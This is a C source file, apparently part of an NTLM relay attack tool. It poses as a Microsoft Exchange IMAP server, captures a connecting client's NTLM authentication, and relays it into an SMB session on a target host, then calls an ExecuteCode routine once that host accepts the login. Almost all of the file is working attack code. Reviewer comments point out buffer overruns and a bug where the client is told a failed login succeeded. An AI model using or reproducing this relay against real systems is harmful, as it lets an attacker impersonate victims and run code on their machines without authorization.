00009 #include "imaprelay.h"
00010 #include "payload.h"
00011
00012 extern int verbose;
00013
/*
 * HandleIncommingIMAPRequest - serve one IMAP client on relay->source and
 * forward its NTLM AUTHENTICATE exchange into an SMB SESSIONSETUPANDX on
 * destinationhostname:destinationport (relay->destination).
 *
 * Sequence as implemented below:
 *   1. send the IMAP banner and read the client's first command line;
 *   2. answer an optional CAPABILITY request, advertising AUTH=NTLM;
 *   3. require "AUTHENTICATE NTLM" and read the client's NTLM type 1
 *      message (inline after the command, or after a "+" continuation);
 *   4. connect to the SMB host, negotiate dialects, send an NTLM type 1
 *      (BuildSmbPacket1) and receive the server's type 2 challenge;
 *   5. forward that challenge, base64-encoded, to the IMAP client as a
 *      "+ " continuation and read the client's type 3 response;
 *   6. wrap the type 3 response into SESSIONSETUPANDX and send it to the
 *      SMB host; success means NtStatus == 0 and the guest bit of Action
 *      is clear;
 *   7. answer the IMAP client with AUTHOK/AUTHERROR and, on success, call
 *      ExecuteCode(*relay).
 *
 * relay               - connection pair; relay->source is the IMAP client,
 *                       relay->destination is established by
 *                       ConnectToRemoteHost.
 * destinationhostname - SMB host to authenticate against.
 * destinationport     - TCP port on that host.
 *
 * Returns 1 when the SMB session setup succeeded (ExecuteCode was called),
 * 0 on any protocol, connection or authentication failure.
 *
 * NOTE(review): the client's type 1 message (buf1/request) is only decoded
 * and dumped; the SMB side sends its own type 1 from BuildSmbPacket1.
 * NOTE(review): SmbPacket1, SmbPacket2 and SmbPacket3 are never freed on any
 * path (NegotiateProtocol is, so BuildSmbPacket presumably allocates), and
 * the destination connection is not closed on the early returns below --
 * confirm whether the caller owns it.
 * NOTE(review): `debug` is used throughout but not declared in this file;
 * presumably it comes from imaprelay.h.
 */
int HandleIncommingIMAPRequest(RELAY *relay, char *destinationhostname, int destinationport)
{
    char buffer[4096];   /* IMAP-side receive buffer */
    char buf[4096];      /* SMB-side receive buffer; also the "+ <challenge>" line */
    char buf1[4096];     /* decoded NTLM messages / base64 of the challenge */
    char buf2[4096];     /* NTLM type 3 built by buildAuthResponse */

    char CurrentUserName[256];     /* filled by GetNTLMPacketInfo, no size passed */
    char CurrentDomain[256];
    char CurrentWorkstation[256];
    smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
    tSmbNtlmAuthRequest *request;  /* view of the client's type 1 message in buf1 */

    uint16 packetlen;    /* length of the NTLM message currently in buf1 */
    int i;               /* byte count / status returned by the helpers below */
    char *p;             /* dialect list for NEGOTIATEPROTOCOLREQUEST */
    char opt[5];         /* first four bytes of the client line, reused as the reply tag */
    const char WelcomeMessage[]= "* OK Microsoft Exchange Server 2007 IMAP4 service ready\r\n";






/* Replies to the client carry the fixed tag "0001", not the client's own tag. */
#define AUTHOK "0001 OK AUTHENTICATE NTLM completed.\r\n"
#define AUTHERROR "0001 ERROR AUTHENTICATE NTLM Failed.\r\n"


    /* Send the banner and read the client's first line in one round trip. */
    printf("[+] Sending IMAP Banner\n");
    i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
    if (i<=0){
        printf("Error Reading IMAP Client message\n");
        return(0);
    }

    /* NOTE(review): this memcmp reads buffer[4..14] regardless of how many
     * bytes (i) arrived, so a short line is compared against uninitialised
     * stack bytes. Nothing on this path NUL-terminates buffer either; the
     * strlen() further down relies on the helper doing that, or on the
     * buffer[i]='\0' in the CAPABILITY branch -- confirm. */
    if (memcmp(buffer+4," CAPABILITY",11)==0) {
        printf("[+] CAPABILITY Request from client\n");
        memcpy(opt,buffer,4); opt[4]='\0';
        /* opt is at most 4 bytes, so this sprintf is bounded in practice. */
        sprintf(buffer,"* CAPABILITY IMAP4 IMAP4rev1 IDLE LITERAL+ AUTH=NTLM\r\n%s OK CAPABILITY completed.\r\n",opt);
        i=SendBytesAndWaitForResponse(relay->source,buffer, strlen(buffer), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0) return(0);
        /* NOTE(review): writes one past the array if the helper can return
         * sizeof(buffer); confirm it caps reads at size-1 (same at every
         * buffer[i]='\0' below). */
        buffer[i]='\0';
    }


    /* Anything other than AUTHENTICATE NTLM is refused. */
    if (memcmp(buffer+4," AUTHENTICATE NTLM",18)!=0) {
        printf("[-] Not supported option %s received\n",buffer);
        i=SendBytesAndWaitForResponse(relay->source,(char*)AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        return(0);
    }
    if (strlen(buffer)>24){
        /* A longer line is taken to carry the base64 type 1 message inline,
         * starting at offset 22 (just past "AUTHENTICATE NTLM"). */
        printf("[+] received AUTH NTLM message\n");
        memset((char*)&buf1,'\0',sizeof(buf1));
        packetlen=from64tobits(buf1, buffer+22);
        request=(tSmbNtlmAuthRequest *)buf1;
        dumpAuthRequest(0,request);
    } else {
        /* Otherwise send the "+" continuation and read the type 1 message
         * as its own line. */
        memset(buffer,'\0',sizeof(buffer));
        i=SendBytesAndWaitForResponse(relay->source,"+\r\n", 3, buffer,sizeof(buffer),SMBWAITTIMEOUT);
        if (i<=0){
            printf("[-] Error Auth response with NTLM type1 packet\n");
            return(0);
        }
        buffer[i]='\0';
        printf("[+] received AUTH NTLM message\n");
        memset((char*)&buf1,'\0',sizeof(buf1));
        packetlen=from64tobits(buf1, buffer);
        request=(tSmbNtlmAuthRequest *)buf1;

        if (debug) {
            printf("[+] received AUTH NTLM message: %s\n",buffer);
            DumpMem(buf1,packetlen);
            dumpAuthRequest(0,request);
        }
    }



    /* i is a success flag here, not a byte count. */
    i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
    if (!i) {
        printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport);
        return(0);
    }
    printf("[+] Sending SMB Protocol Authentication Handshake\n");
    /* AddDialect appends to p and, presumably, keeps the running length of
     * the list in i -- that is what BuildSmbPacket is given below. */
    p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
    p = AddDialect(p,"LANMAN1.0", 0x02,&i);
    p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
    p = AddDialect(p,"LM1.2X002", 0x02,&i);
    p = AddDialect(p,"LANMAN2.1", 0x02,&i);
    p = AddDialect(p,"NT LM 0.12", 0x02,&i);
    NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
    free(p);
    /* The negotiate response lands in buf but is not inspected beyond i>0. */
    i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    free(NegotiateProtocol);
    if (i<=0){
        printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
        return(0);
    }

    /* NTLM type 1 for the SMB side; never freed (see header note). */
    SmbPacket1=BuildSmbPacket1();
    if (debug) {
        printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
        DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
    }

    /* Presumably sends SmbPacket1 and returns the server's reply carrying
     * the NTLM type 2 challenge; never freed (see header note). */
    SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
    if (SmbPacket2==NULL) {
        printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
        return(0);
    }
    printf("[+] Received SMB Message with NTLM message type 2 packet\n");
    /* The two bytes preceding the NTLM blob in SmbPacket2 are read as its
     * length (presumably the security-blob length field). They are copied
     * raw, so this assumes a little-endian host -- TODO confirm.
     * NOTE(review): packetlen originates from the peer's packet and is not
     * bounded against sizeof(buf1) before it is base64-expanded below. */
    memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);

    if (debug) {
        printf("[*] SMB Packet Dump:\n");
        DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
        printf("[*] NTLM Challenge packet from SMB message\n");
        DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
        dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
    }

    /* The challenge's negotiate flags are overwritten with a constant before
     * it is forwarded; the server's original flags are discarded. */
    ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
    memset(buf1,'\0',sizeof(buf1));
    /* NOTE(review): base64 grows the data by 4/3 with no bound on buf1, and
     * the sprintf adds "+ " and "\r\n" on top of buf1's length with no bound
     * on buf; either can overrun its 4096-byte array. */
    to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
    sprintf(buf,"+ %s\r\n",buf1);

    printf("[+] Replaying NTLM Challenge from SMB Server to the IMAP Client\n");
    if (debug)
    {
        /* The log text says SMTP but this is the IMAP side (runtime string left as is). */
        printf("[+] Sending SMTP Response: %s\n",buf);
    }
    /* Send the challenge continuation; the reply is the client's type 3. */
    i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
    if (i<=0)
    {
        printf("[-] Unable to read NTLM packet 3 from IMAP client\n");
        return(0);
    }
    buffer[i]='\0';

    if (debug) printf("[*] Response: %s\n",buffer);
    memset((char*)buf1,'\0',sizeof(buf1));
    /* buf1 now holds the client's decoded type 3 message. */
    packetlen=from64tobits(buf1, buffer);
    if (debug) {

        printf("[*] Raw authorization packet (len: %i)\n",packetlen);
        DumpMem(buf1,packetlen);
        dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);
    }


    /* NOTE(review): the three 256-byte arrays are passed without their
     * sizes; confirm GetNTLMPacketInfo bounds its copies of the name fields
     * taken from the client-supplied message. */
    GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
    printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
    /* Builds the type 3 to send to the SMB host into buf2 from the server's
     * challenge and the client's response (last argument). The 0 and the two
     * NULLs are presumably unused on this path -- confirm against the
     * prototype. buf2 is passed without a size. */
    buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
    /* SmbPacket2 is handed in as the reference packet; never freed (see header note). */
    SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));


    printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
    if (debug)
    {
        DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
    }

    i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    if (i<=0){
        printf("[-] Error reading Server Authentication Response\n");
        /* Return value of the final reply to the client is ignored here and below. */
        i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        return(0);
    }
    if (debug) {
        printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
        DumpMem(buf,i);
    }

    /* NOTE(review): buf is reinterpreted as an smheader without checking
     * that i covers the header (and the SessionSetupAndXResponse below). */
    if (((smheader*)buf)->NtStatus!=0x00000000) {
        printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
        /* NOTE(review): on this failure path the client is sent AUTHOK (a
         * success reply) sized with strlen(AUTHERROR), while the guest
         * branch below sends AUTHERROR; almost certainly a copy/paste slip
         * and AUTHERROR was meant. Both strings are 38 bytes, so nothing is
         * truncated, but the client is told it succeeded. */
        i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
        return(0);
    }
    /* Action bit 0 set means the session was granted as guest; treated as failure. */
    if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
    {
        printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
        i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);

        return(0);
    }



    printf("[+] SessionSetupAndX Completed \n");
    /* "Authenticacion" is a typo in a runtime string; left as is. */
    printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);
    i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT);
    /* relay is passed by value; what ExecuteCode does is not visible in this file. */
    ExecuteCode( *relay);

    return(1);

}